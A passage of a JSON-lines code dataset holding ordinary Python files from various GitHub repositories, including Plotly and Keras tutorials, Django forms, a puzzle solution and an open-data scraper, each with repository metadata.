esamNeg.copy()\nesamPosOrig = esamPos.copy()\n# %%\ncells = esamNeg+esamPos\nlowEcc, highEcc = [], []\nlowEccThresh, highEccThresh = 0.4, 0.9\nfor cell in cells:\n region = regionprops(cell.mask.astype(np.uint8))\n if len(region)>1:\n region = sorted(region, key = lambda allprops: allprops.area)\n region = region[0]\n if region.eccentricity <= lowEccThresh:\n lowEcc.append(cell)\n elif region.eccentricity >= highEccThresh:\n highEcc.append(cell)\n# %%\nscalingBool = 0\nreferencePerim = highEcc[0].perimInt\nc = 1\n\nfor cell in lowEcc:\n currentPerim = cell.perimInt\n \n refPerim2, currentPerim2, disparity = cellMorphHelper.procrustes(referencePerim, currentPerim, scaling=scalingBool)\n\n cell.perimAligned = currentPerim2 - np.mean(currentPerim2, axis=0)\n\nfor cell in highEcc:\n currentPerim = cell.perimInt\n \n refPerim2, currentPerim2, disparity = cellMorphHelper.procrustes(referencePerim, currentPerim, scaling=scalingBool)\n\n cell.perimAligned = currentPerim2 - np.mean(currentPerim2, axis=0)\n# %%\nrandom.seed(1234)\nrandom.shuffle(lowEcc)\ncells = lowEcc+highEcc[0:len(lowEcc)]\nnCells = len(lowEcc)\nlabels = ['low' for i in range(nCells)]+['high' for i in range(nCells)]\n\nX = []\nfor cell in cells:\n X.append(cell.perimAligned.ravel())\nX = np.array(X)\n# %%\nfit = umap.UMAP()\nu = fit.fit_transform(X)\n# %%\nfontSize = 20\nfig, ax = plt.subplots()\nfig.set_size_inches(6, 6)\n\nlabel2Color = {'low': 'red', 'high': 'blue'}\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\n\nfor label in np.unique(labels):\n labelIdx = np.where(np.array(labels)==label)\n ux = u[labelIdx,0]\n uy = u[labelIdx,1]\n ax.scatter(ux, uy, s=5, c=label2Color[label], alpha=0.5, label=label)\n\nax.set_xlabel('UMAP 1')\nax.set_ylabel('UMAP 2')\nax.set_title(f'ESAM Perimeter Morphology Eccentricity > {eccNum:0.2f}')\nax.title.set_size( fontSize)\nax.xaxis.label.set_size(fontSize)\nax.yaxis.label.set_size(fontSize)\nax.legend(markerscale=4)\nax.xaxis.set_ticklabels([])\nax.yaxis.set_ticklabels([])\nax.set_yticks([])\nax.set_xticks([])","repo_name":"TylerJost/cellMorph","sub_path":"notebooks/old/highLowEccentricity.py","file_name":"highLowEccentricity.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19943026324","text":"# Basic Plotly Charts\n\n# Get Started with Different Chart types in Plotly\n\n# Import required libraries\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n# 1. Scatter Plot:\n\n# A scatter plot shows the relationship between 2 variables on the x and y-axis. \n# The data points here appear scattered when plotted on a two-dimensional plane. \n# Using scatter plots, we can create exciting visualizations to express various relationships, such as:\n# - Height vs weight of persons\n# - Engine size vs automobile price\n# - Exercise time vs Body Fat\n\n##Example 1: Let us illustrate the income vs age of people in a scatter plot\n\nage_array=np.random.randint(25,55,60)\n# Define an array containing salesamount values \nincome_array=np.random.randint(300000,700000,3000000)\n\n##First we will create an empty figure using go.Figure()\nfig=go.Figure()\n\n#Data type check\nprint(type(fig))\n\n#Next we will create a scatter plot by using the add_trace function and use the go.scatter() function within it\n# In go.Scatter we define the x-axis data,y-axis data and define the mode as markers with color of the marker as blue\nfig.add_trace(go.Scatter(x=age_array, y=income_array, mode='markers', marker=dict(color='blue')))\n\n# However in the previous output title, x-axis and y-axis labels are missing. Let us use the update_layout function to update the title and labels.\n\n## Here we update these values under function attributes such as title,xaxis_title and yaxis_title\nfig.update_layout(title='Economic Survey', xaxis_title='Age', yaxis_title='Income')\n# Display the figure\nfig.show()\n\n# Inferences:\n# From the above plot we find that the Income of a person is not correlated with age. We find that as the age increases the income may or not decrease.\n\n# 2. Line Plot:\n# A line plot shows information that changes continuously with time. Here the data points are connected by straight lines. \n# Line plots are also plotted on a two dimensional plane like scatter plots. Using line plots, we can create exciting visualizations to illustrate:\n# - Annual revenue growth\n# - Stock Market analysis over time\n# - Product Sales over time\n\n\n##Example 2: Let us illustrate the sales of bicycles from Jan to August last year using a line chart\n# Define an array containing numberofbicyclessold \nnumberofbicyclessold_array=[50,100,40,150,160,70,60,45]\n# Define an array containing months\nmonths_array=[\"Jan\",\"Feb\",\"Mar\",\"April\",\"May\",\"June\",\"July\",\"August\"]\n\n##First we will create an empty figure using go.Figure()\nfig=go.Figure()\n#Next we will create a line plot by using the add_trace function and use the go.scatter() function within it\n# In go.Scatter we define the x-axis data,y-axis data and define the mode as lines with color of the marker as green\nfig.add_trace(go.Scatter(x=months_array, y=numberofbicyclessold_array, mode='lines', marker=dict(color='green')))\n## Here we update these values under function attributes such as title,xaxis_title and yaxis_title\nfig.update_layout(title='Bicycle Sales', xaxis_title='Months', yaxis_title='Number of Bicycles Sold')\n# Display the figure\nfig.show()\n\n# Inferences: From the above plot we find that the sales is the highest in the month of May and then there is a decline in sales.\n# We will now use plotly express library to plot the other graphs\n\n# 3.Bar Plot:\n# A bar plot represents categorical data in rectangular bars. Each category is defined on one axis, and the value counts for this category are represented on another axis. \n# Bar charts are generally used to compare values.We can use bar plots in visualizing:\n# - Pizza delivery time in peak and non peak hours\n# - Population comparison by gender\n# - Number of views by movie name\n\n##Example 3: Let us illustrate the average pass percentage of classes from grade 6 to grade 10\n\n# Define an array containing scores of students \nscore_array=[80,90,56,88,95]\n# Define an array containing Grade names \ngrade_array=['Grade 6','Grade 7','Grade 8','Grade 9','Grade 10']\n\n# In plotly express we set the axis values and the title within the same function call \n# px.(x=,y=,title=).\n# In the below code we use px.bar( x=grade_array, y=score_array, title='Pass Percentage of Classes').\n\n\n# Use plotly express bar chart function px.bar.Provide input data, x and y axis variable, and title of the chart.\n# This will give average pass percentage per class\nfig = px.bar( x=grade_array, y=score_array, title='Pass Percentage of Classes') \nfig.show()\n\n# From the above plot we find that Grade 8 has the lowest pass percentage and Grade 10 has the highest pass percentage\n\n# 4.Histogram:\n# A histogram is used to represent continuous data in the form of bar. \n# Each bar has discrete values in bar graphs, whereas in histograms, we have bars representing a range of values. \n# Histograms show frequency distributions. We can use histograms to visualize:\n# - Students marks distribution\n# - Frequency of waiting time of customers in a Bank\n\n\n##Example 4: Let us illustrate the distribution of heights of 200 people using a histogram\n\nimport numpy as np\n#Here we will concentrate on heights which are 160 and the standard deviation is 11\nheights_array = np.random.normal(160, 11, 200)\n## Use plotly express histogram chart function px.histogram.Provide input data x to the histogram\nfig = px.histogram(x=heights_array,title=\"Distribution of Heights\")\nfig.show()\n\n# From this we can analyze that there are around 2 people who are at the height of 130cm and 45 people at the height of 160 cm\n\n# 5. Bubble Plot:\n# A bubble plot is used to show the relationship between 3 or more variables. It is an extension of a scatter plot. Bubble plots are ideal for visualizing:\n# - Global Economic position of Industries\n# - Impact of viruses on Diseases\n\n##Example 4: Let us illustrate crime statistics of US cities with a bubble chart\n\n#Create a dictionary having city,numberofcrimes and year as 3 keys\ncrime_details = {\n 'City' : ['Chicago', 'Chicago', 'Austin', 'Austin','Seattle','Seattle'],\n 'Numberofcrimes' : [1000, 1200, 400, 700,350,1500],\n 'Year' : ['2007', '2008', '2007', '2008','2007','2008'],\n}\n \n# create a Dataframe object with the dictionary\ndf = pd.DataFrame(crime_details)\n \ndf\n\n## Group the number of crimes by city and find the total number of crimes per city\nbub_data = df.groupby('City')['Numberofcrimes'].sum().reset_index()\n\n##Display the grouped dataframe\nbub_data\n\n## Bubble chart using px.scatter function with x ,y and size varibles defined.Title defined as Crime Statistics\nfig = px.scatter(bub_data, x=\"City\", y=\"Numberofcrimes\", size=\"Numberofcrimes\",\n hover_name=\"City\", title='Crime Statistics', size_max=60)\nfig.show()\n\n# The size of the bubble in the bubble chart indicates that Chicago has the highest crime rate when compared with the other 2 cities.\n\n# 6.Pie Plot:\n# A pie plot is a circle chart mainly used to represent proportion of part of given data with respect to the whole data. \n# Each slice represents a proportion and on total of the proportion becomes a whole. We can use bar plots in visualizing:\n# - Sales turnover percentatge with respect to different products\n# - Monthly expenditure of a Family\n\n## Monthly expenditure of a family\n# Random Data\nexp_percent= [20, 50, 10,8,12]\nhouse_holdcategories = ['Grocery', 'Rent', 'School Fees','Transport','Savings']\n\n# Use px.pie function to create the chart. Input dataset. \n# Values parameter will set values associated to the sector. 'exp_percent' feature is passed to it.\n# labels for the sector are passed to the `house hold categoris` parameter.\nfig = px.pie(values=exp_percent, names=house_holdcategories, title='Household Expenditure')\nfig.show()\n\n# From this pie chart we can find that the family expenditure is maximum for rent.\n\n# 7.Sunburst Charts:\n# Sunburst charts represent hierarchial data in the form of concentric circles. \n# Here the innermost circle is the root node which defines the parent, and then the outer rings move down the hierarchy from the centre. \n# They are also called radial charts.We can use them to plot\n\n# Worldwide mobile Sales where we can drill down as follows:\n\n# - innermost circle represents total sales\n# -first outer circle represents continentwise sales\n# -second outer circle represents countrywise sales within each continent\n# Disease outbreak hierarchy\n# Real Estate Industrial chain\n\n##Example 4: Let us illustrate plot the \n\n#Create a dictionary having a set of people represented by a character array and the parents of these characters represented in another\n## array and the values are the values associated to the vectors.\ndata = dict(\n character=[\"Eve\", \"Cain\", \"Seth\", \"Enos\", \"Noam\", \"Abel\", \"Awan\", \"Enoch\", \"Azura\"],\n parent=[\"\", \"Eve\", \"Eve\", \"Seth\", \"Seth\", \"Eve\", \"Eve\", \"Awan\", \"Eve\" ],\n value=[10, 14, 12, 10, 2, 6, 6, 4, 4])\n\nfig = px.sunburst(\n data,\n names='character',\n parents='parent',\n values='value',\n title=\"Family chart\"\n)\nfig.show()\n\n# It is found that here the innermost circle Eve represents the parent and the second outer circle represents his childrent Cain,Seth and so on.\n# Further the outermost circle represents his grandchildren Enoch and Enos\n\n# Practice Exercises: Apply your Plotly Skills to an Airline Dataset\n# The Reporting Carrier On-Time Performance Dataset contains information on approximately 200 million domestic US flights reported to the United States Bureau of \n# Transportation Statistics. The dataset contains basic information about each flight (such as date, time, departure airport, arrival airport) and, if applicable, \n# the amount of time the flight was delayed and information about the reason for the delay. This dataset can be used to predict the likelihood of a flight arriving on time.\n","repo_name":"Marcin-Lewandowski/Data_Science","sub_path":"plotly_charts.py","file_name":"plotly_charts.py","file_ext":"py","file_size_in_byte":9836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23103765497","text":"import sys\nimport cv2\n\nimg = cv2.imread('./Opencv/cat.bmp') \n\nif img is None:\n print('Image load failed!')\n sys.exit()\n\n \ncv2.namedWindow('image') # wn\ncv2.imshow('image', img)\ncv2.waitKey()\n\ncv2.destroyAllWindows()\n","repo_name":"sunho-park/study1","sub_path":"OpenCV/1_opencv.py","file_name":"1_opencv.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44465639228","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Mar 1 10:19:08 2020\r\n\r\n@author: Andrew\r\n\"\"\"\r\n\r\n\r\nfrom keras.datasets import mnist\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense, Conv2D, Flatten\r\n\r\n#Getting and seperating data into train and test\r\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\r\n\r\n#Reshaping\r\nX_train = X_train.reshape(60000,28,28,1)\r\nX_test = X_test.reshape(10000,28,28,1)\r\n\r\n#Changing into categorical (vector with a 1 on it)\r\ny_train = to_categorical(y_train)\r\ny_test = to_categorical(y_test)\r\n\r\n#Buidling model, two convolutional layers using relu, softmax so it can make predictions on probabilities\r\nmodel = Sequential()\r\nmodel.add(Conv2D(64,kernel_size=3,activation='relu', input_shape=(28,28,1)))\r\nmodel.add(Conv2D(32, kernel_size=3, activation='relu'))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(10, activation='softmax'))\r\n\r\n#Compliling \r\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n#Fitting\r\nmodel.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=3)\r\n\r\n\r\n","repo_name":"aricketts99/First-CNN-mnist-dataset","sub_path":"first_keras_cnn.py","file_name":"first_keras_cnn.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9885293941","text":"class Data:\n products = {}\n representations = {}\n\n @classmethod\n def purge(cls):\n cls.products = {}\n cls.representations = {}\n\n @classmethod\n def load(cls, file, product_id):\n if not file:\n return\n cls.products[product_id] = []\n product = file.by_id(product_id)\n representations = []\n if product.is_a(\"IfcProduct\") and product.Representation:\n representations = product.Representation.Representations\n elif product.is_a(\"IfcTypeProduct\"):\n representations = [rm.MappedRepresentation for rm in product.RepresentationMaps or []]\n for representation in representations:\n c = representation.ContextOfItems\n rep_id = int(representation.id())\n cls.representations[rep_id] = {\n \"RepresentationIdentifier\": representation.RepresentationIdentifier,\n \"RepresentationType\": representation.RepresentationType,\n \"ContextOfItems\": {\n \"ContextType\": c.ContextType,\n \"ContextIdentifier\": c.ContextIdentifier,\n \"TargetView\": c.TargetView if c.is_a(\"IfcGeometricRepresentationSubContext\") else \"\",\n },\n }\n cls.products[product_id].append(rep_id)\n","repo_name":"vulevukusej/BlenderBIM","sub_path":"standalone scripts for ifcopenshell/ifcopenshell/api/geometry/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"16933196160","text":"# -*- coding: UTF-8 -*-\r\n# !/usr/bin/python\r\n# @time :2019/5/10 10:49\r\n# @author :Mo\r\n# @function : 1. create model of keras-bert for get [-2] layers\r\n# 2. create model of AttentionWeightedAverage for get avg attention pooling\r\n\r\nfrom keras.engine import InputSpec\r\nimport keras.backend as k_keras\r\nfrom keras.engine import Layer\r\nfrom keras import initializers\r\n\r\n\r\nclass NonMaskingLayer(Layer):\r\n \"\"\"\r\n fix convolutional 1D can't receive masked input, detail: https://github.com/keras-team/keras/issues/4978\r\n thanks for https://github.com/jacoxu\r\n \"\"\"\r\n\r\n def __init__(self, **kwargs):\r\n self.supports_masking = True\r\n super(NonMaskingLayer, self).__init__(**kwargs)\r\n\r\n def build(self, input_shape):\r\n pass\r\n\r\n def compute_mask(self, input, input_mask=None):\r\n # do not pass the mask to the next layers\r\n return None\r\n\r\n def call(self, x, mask=None):\r\n return x\r\n\r\n def compute_output_shape(self, input_shape):\r\n return input_shape\r\n\r\n\r\nclass AttentionWeightedAverage(Layer):\r\n '''\r\n codes from: https://github.com/BrikerMan/Kashgari\r\n detail: https://github.com/BrikerMan/Kashgari/blob/master/kashgari/tasks/classification/models.py\r\n Computes a weighted average of the different channels across timesteps.\r\n Uses 1 parameter pr. channel to compute the attention value for a single timestep.\r\n '''\r\n\r\n def __init__(self, return_attention=False, **kwargs):\r\n self.init = initializers.get('uniform')\r\n self.supports_masking = True\r\n self.return_attention = return_attention\r\n super(AttentionWeightedAverage, self).__init__(**kwargs)\r\n\r\n def build(self, input_shape):\r\n self.input_spec = [InputSpec(ndim=3)]\r\n assert len(input_shape) == 3\r\n\r\n self.W = self.add_weight(shape=(input_shape[2], 1),\r\n name='{}_w'.format(self.name),\r\n initializer=self.init)\r\n self.trainable_weights = [self.W]\r\n super(AttentionWeightedAverage, self).build(input_shape)\r\n\r\n def call(self, x, mask=None):\r\n # computes a probability distribution over the timesteps\r\n # uses 'max trick' for numerical stability\r\n # reshape is done to avoid issue with Tensorflow\r\n # and 1-dimensional weights\r\n logits = k_keras.dot(x, self.W)\r\n x_shape = k_keras.shape(x)\r\n logits = k_keras.reshape(logits, (x_shape[0], x_shape[1]))\r\n ai = k_keras.exp(logits - k_keras.max(logits, axis=-1, keepdims=True))\r\n\r\n # masked timesteps have zero weight\r\n if mask is not None:\r\n mask = k_keras.cast(mask, k_keras.floatx())\r\n ai = ai * mask\r\n att_weights = ai / (k_keras.sum(ai, axis=1, keepdims=True) + k_keras.epsilon())\r\n weighted_input = x * k_keras.expand_dims(att_weights)\r\n result = k_keras.sum(weighted_input, axis=1)\r\n if self.return_attention:\r\n return [result, att_weights]\r\n return result\r\n\r\n def get_output_shape_for(self, input_shape):\r\n return self.compute_output_shape(input_shape)\r\n\r\n def compute_output_shape(self, input_shape):\r\n output_len = input_shape[2]\r\n if self.return_attention:\r\n return [(input_shape[0], output_len), (input_shape[0], input_shape[1])]\r\n return (input_shape[0], output_len)\r\n\r\n def compute_mask(self, input, input_mask=None):\r\n if isinstance(input_mask, list):\r\n return [None] * len(input_mask)\r\n else:\r\n return None\r\n","repo_name":"yongzhuo/nlp_xiaojiang","sub_path":"ClassificationText/bert/keras_bert_layer.py","file_name":"keras_bert_layer.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":1494,"dataset":"github-code","pt":"48"} +{"seq_id":"35627493735","text":"# This sample tests the handling of fields within a dataclass that\n# are descriptors.\n\nfrom dataclasses import dataclass\n\nfrom typing import overload, Any, TypeVar, Generic, Optional, Union, Callable, Type\nfrom typing_extensions import dataclass_transform\n\n\n_T = TypeVar(\"_T\")\n\n\nclass A(Generic[_T]):\n ...\n\n\nclass Desc(Generic[_T]):\n @overload\n def __get__(self, instance: None, owner: Any) -> A[_T]:\n ...\n\n @overload\n def __get__(self, instance: object, owner: Any) -> _T:\n ...\n\n def __get__(self, instance: Optional[object], owner: Any) -> Union[A[_T], _T]:\n ...\n\n\n@dataclass_transform(field_specifiers=(Desc[Any],))\ndef dataclass_like(\n *,\n init: bool = True,\n repr: bool = True, # noqa: A002\n eq: bool = True,\n order: bool = False,\n unsafe_hash: bool = False,\n) -> Callable[[Type[_T]], Type[_T]]:\n ...\n\n\n@dataclass_like()\nclass B:\n x: Desc[int]\n y: Desc[str]\n z: Desc[str] = Desc()\n\n\n@dataclass\nclass C:\n x: Desc[int]\n y: Desc[str]\n z: Desc[str] = Desc()\n\n\nreveal_type(B.x, expected_text=\"A[int]\")\nreveal_type(B.y, expected_text=\"A[str]\")\nreveal_type(B.z, expected_text=\"A[str]\")\nreveal_type(C.x, expected_text=\"A[int]\")\nreveal_type(C.y, expected_text=\"A[str]\")\nreveal_type(C.z, expected_text=\"A[str]\")\n\nb = B(Desc(), Desc(), Desc())\nreveal_type(b.x, expected_text=\"int\")\nreveal_type(b.y, expected_text=\"str\")\nreveal_type(b.z, expected_text=\"str\")\n\nc = C(Desc(), Desc(), Desc())\nreveal_type(c.x, expected_text=\"int\")\nreveal_type(c.y, expected_text=\"str\")\nreveal_type(c.z, expected_text=\"str\")\n","repo_name":"microsoft/pyright","sub_path":"packages/pyright-internal/src/tests/samples/dataclassDescriptors2.py","file_name":"dataclassDescriptors2.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":11208,"dataset":"github-code","pt":"48"} +{"seq_id":"74896172946","text":"\"\"\"\nGiven a binary tree, find its maximum depth.\n\nThe maximum depth is the number of nodes along the longest path from\n the root node down to the farthest leaf node.\n\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution(object):\n def maxDepth(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n def recurMethod(node):\n if node is None:\n return 0\n\n if node.right is None and node.left is None:\n return 1\n\n left, right = 0, 0\n\n if node.left is not None:\n left = recurMethod(node.left)\n\n if node.right is not None:\n right = recurMethod(node.right)\n\n return 1 + max(left, right)\n return recurMethod(root)\n","repo_name":"Faiz-zz-zz/interview_questions","sub_path":"max_depth_of_binary_tree.py","file_name":"max_depth_of_binary_tree.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"4380752179","text":"from machine import I2C\nfrom lib.devices.axp import AXP192\n\nclass Battery:\n def read(self):\n i2c = I2C(baudrate=400_000, pins=('G21','G22'))\n axp = AXP192(i2c)\n read = axp.batt_percentage()\n i2c.deinit()\n return read\n","repo_name":"PiniponSelvagem/Cybertruck-RC","sub_path":"microcontroller/python/cybertruck/battery.py","file_name":"battery.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74866423186","text":"#!/usr/bin/python3.8\n# -*- coding: utf-8 -*-\n# @Author: Mack\n# @Time: 2022/12/22 17:16 \n# @File: ex45.py\n# @Software: PyCharm\n\n\nfrom selenium import webdriver\n\nbrowser = webdriver.Firefox()\nbrowser.get('http://localhost:8000')\nassert 'Django' in browser.title\n","repo_name":"MackDing/practice-of-Rhythm","sub_path":"Python/Learn-Python3-The-Hard-Way/ex45.py","file_name":"ex45.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11607948426","text":"from django.forms.models import ModelForm\nfrom app.tickets.models import Ticket, TicketUpdate, TicketType\nfrom django import forms\nfrom django.utils.translation import ugettext as _\n\n\nclass ClientTicketForm(ModelForm):\n \"\"\"\n Form for making comments\n \"\"\"\n comment = forms.CharField(widget=forms.Textarea, label=_(\"Add Comment\"))\n attach = forms.FileField(label=_(\"Add Attachment\"), required=False)\n\n class Meta:\n model = Ticket\n fields = ()\n\n\n def save(self, *args, **kwargs):\n ticket = super(ClientTicketForm, self).save()\n ticketupdate = TicketUpdate.objects.create(ticket=ticket,\n comment=self.cleaned_data['comment'],\n attachment=self.cleaned_data['attach'])\n\n return ticketupdate\n\n\nclass ClientNewTicketForm(ModelForm):\n \"\"\" Form for creating new tickets \"\"\"\n\n client = None\n\n class Meta:\n model = Ticket\n fields = ('title', 'description', 'company')\n\n\n def __init__(self, client, *args, **kwargs):\n super(ModelForm, self).__init__(*args, **kwargs)\n self.client = client\n self.fields['company'].queryset = client.get_related_companys()\n self.fields['company'].empty_label = None\n\n def save(self, commit=True):\n ticket = super(ClientNewTicketForm, self).save(commit=False)\n ticket.client_user = self.client\n ticket.type = TicketType.objects.get_or_create(name=_(\"Client ticket\"),\n company=self.cleaned_data['company'],\n description=_(\"Submitted by a client\"))[0]\n ticket.save(commit=commit)\n self.client.tickets.add(ticket)\n\n return ticket\n\n \n\n \n\n \n\n\n\n","repo_name":"frecar/focus","sub_path":"project/app/client/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"44861897816","text":"import pygame\n\nclass Button():\n\t\"\"\"\n\tThis function is used to initialize the button\n\n\tParameters:\n\t\t\tsurface (pygame.Surface): The surface of the button\n\t\t\tx (int): The x position of the button\n\t\t\ty (int): The y position of the button\n\t\t\timage (pygame.Surface): The image of the button\n\t\t\tsize_x (int): The size of the button in x axis\n\t\t\tsize_y (int): The size of the button in y axis\n\t\t\tname (str): The name of the button\n\t\t\tdescription (str): The description of the button. Default is empty string\n\n \tReturns:\n\t\t\tNone\n\t\"\"\"\n\tdef __init__(self, surface, x, y, image, size_x, size_y, name, description=''):\n\t\tself.image = pygame.transform.scale(image, (size_x, size_y))\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.topleft = (x, y)\n\t\tself.clicked = False\n\t\tself.surface = surface\n\t\tself.name = name\n\t\tself.description = description\n\n\t\t\"\"\"\n\t\tThis function is used to draw the button\n\n\t\tParameters:\n\t\t\t\tNone\n\n\t\tReturns:\n\t\t\t\taction (bool): The action of the button\n\t\t\"\"\"\n\tdef draw(self):\n\t\taction = False\n\n\t\tpos = pygame.mouse.get_pos()\n\n\t\tif self.rect.collidepoint(pos):\n\t\t\tif pygame.mouse.get_pressed()[0] == 1 and self.clicked == False:\n\t\t\t\taction = True\n\t\t\t\tself.clicked = True\n\n\t\tif pygame.mouse.get_pressed()[0] == 0:\n\t\t\tself.clicked = False\n\n\t\tself.surface.blit(self.image, (self.rect.x, self.rect.y))\n\n\t\treturn action","repo_name":"zyx-0314/Turn-Based-Rogue-Game","sub_path":"components/buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69891533587","text":"from django.urls import path\nfrom . import views\n\napp_name = 'store'\n\nurlpatterns = [\n path('', views.home, name = \"store-home\"),\n path('about/', views.about, name = \"store-about\"),\n path('book/', views.book, name = \"store-book\"),\n path('register/', views.user_register, name='user_register'), # maybe change\n path('login/', views.user_login, name='user_login'),\n path('logout/', views.user_logout, name='user_logout'),\n path('rentals/', views.user_rentals, name='user_rentals'),\n path('returns/', views.user_returns, name='user_returns'),\n\n\n\n]\n","repo_name":"AreebRoyepen/Video-Store-Management-System","sub_path":"store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34339118084","text":"import itertools\n\n# logo script to walk the spiral\ndef gen_logo():\n\tfor n in itertools.count():\n\t\tfor n in range(n+1):\n\t\t\tyield('F')\n\t\tyield('L')\n\t\tfor n in range(n+1):\n\t\t\tyield('F')\n\t\tyield('L')\n\nprint(''.join(itertools.islice(gen_logo(), 100))) # grab the first five elements\n\n# logo turtle interpreter, returns (n,x,y) each square visited\nrotL = {'N': 'W', 'S': 'E', 'E':'N', 'W': 'S' }\nmove = {'N': (0,1), 'S':(0,-1), 'E':(1,0), 'W':(-1,0)} # (x,y)\ndef gene():\n\tx,y,n = 0,0,0\n\tdirection = 'E'\n\tfor cmd in gen_logo():\n\t\tif cmd == 'L':\n\t\t\tdirection = rotL[direction]\n\t\telif cmd == 'F':\n\t\t\txd, yd = move[direction]\n\t\t\tn = n + 1\n\t\t\tyield( (n, x, y) )\n\t\t\tx = x + xd\n\t\t\ty = y + yd\n\nprint(list(itertools.islice(gene(), 26)))\n\ndef walk(steps):\n\tfor n, x, y in gene():\n\t\tif n == steps:\n\t\t\treturn abs(x) + abs(y)\n\ndef check(steps, e):\n\tprint('{} == {}'.format(walk(steps), e))\n\ncheck(1, 0) #1 is carried 0 steps, since it's at the access port.\ncheck(12, 3) #Data from square 12 is carried 3 steps, such as: down, left, left.\ncheck(23, 2) #Data from square 23 is carried only 2 steps: up twice.\ncheck(1024, 31) #Data from square 1024 must be carried 31 steps.\n\nprint(walk(289326))\n\n# part 2 \n# each position in the spiral has an associated value, which is assigned once\n# based ont he sum of the neigbouring 9 squares, or zero if not assigned at that time\n\ndef neighbours(x,y):\n\tyield (x,y+1)\n\tyield (x,y-1)\n\tyield (x+1,y)\n\tyield (x-1,y)\n\tyield (x+1,y+1)\n\tyield (x-1,y+1)\n\tyield (x+1,y-1)\n\tyield (x-1,y-1)\n\ndef gene2():\n\tsaved_values = {}\n\taround = 1\n\tfor n,x,y in gene():\n\t\tif n > 1:\n\t\t\taround = sum([ saved_values.get( (nx, ny), 0) for (nx,ny) in neighbours(x,y) ])\n\t\tsaved_values[ (x,y) ] = around\n\t\tyield(around)\n\nprint(list(itertools.islice(gene2(), 26)))\n\nfor x in gene2():\n\tif x > 289326:\n\t\tprint(x)\n\t\tbreak\n\n","repo_name":"shuckc/adventofcode","sub_path":"2017/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36621228005","text":"import os\nimport sys\n\nfrom from_root import from_root\n\np = from_root('CONTRIBUTING.md').parent\nsys.path.insert(1, str(p))\n\nfrom scrapers_library.data_portals.opendata.opendata_scraper_2 import \\\n opendata_scraper2\n\nsave_url = [\n [\"crime_data/2020-present/\", \"https://data.lacity.org/resource/2nrs-mtv8.csv\"],\n [\n \"vehicle_ped_stop/2010-present/\",\n \"https://data.lacity.org/resource/ci25-wgt7.csv\",\n ],\n [\"arrests/2020-present/\", \"https://data.lacity.org/resource/amvf-fr72.csv\"],\n [\"response_metrics/citywide/\", \"https://data.lacity.org/resource/kcsj-s69p.csv\"],\n [\"cfs/2021/\", \"https://data.lacity.org/resource/cibt-wiru.csv\"],\n]\n\nsave_folder = \"./data/\"\n\n# Optional argument `save_subfolder` allows saving in a subfolder\n# Optional argument `sleep_time` should be set to the site's crawl-delay,\n# which can be found in their robots.txt file_name, default time is 1\nopendata_scraper2(save_url, save_folder, sleep_time=1, save_subfolder=True)\n","repo_name":"Police-Data-Accessibility-Project/scrapers","sub_path":"scrapers_library/CA/los_angeles_county/los_angeles/los_angeles_police/la_opendata.py","file_name":"la_opendata.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"48"} +{"seq_id":"7540703244","text":"import requests\r\nfrom time import time\r\nimport re\r\n\r\ndef base36encode(number, alphabet='0123456789abcdefghijklmnopqrstuvwxyz'):\r\n \"\"\"Source: Stack Overflow\"\"\"\r\n if not isinstance(number, int):\r\n raise TypeError('number must be an integer')\r\n base36 = ''\r\n sign = ''\r\n if number < 0:\r\n sign = '-'\r\n number = -number\r\n if 0 <= number < len(alphabet):\r\n return sign + alphabet[number]\r\n while number != 0:\r\n number, i = divmod(number, len(alphabet))\r\n base36 = alphabet[i] + base36\r\n return sign + base36\r\n\r\ndef getRequest(url):\r\n responseSuccess = False\r\n while responseSuccess == False:\r\n request = 